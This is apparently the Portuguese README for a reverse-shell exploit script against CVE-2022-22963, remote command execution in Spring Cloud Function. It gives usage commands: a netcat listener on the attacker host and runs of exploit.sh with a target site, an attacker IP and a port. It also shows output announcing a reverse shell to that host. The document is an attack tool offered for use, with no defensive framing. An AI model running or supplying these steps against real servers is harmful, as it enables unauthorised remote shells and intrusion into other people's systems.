
Exploit para execução remota de comandos CVE-2022-22963 no Spring Cloud Function
Exploit para CVE-2022-22963 execução remota de comandos no Spring Cloud Function
Veja detalhes sobre a vulnerabilidade aqui e aqui
Execute o netcat no seu host:
$ nc -lvnp 9001
Execute o exploit (exemplo) com a porta padrão 9001 no host atacante:
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done
Execute o exploit (exemplo) com a porta especificada 1337 no host atacante:
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done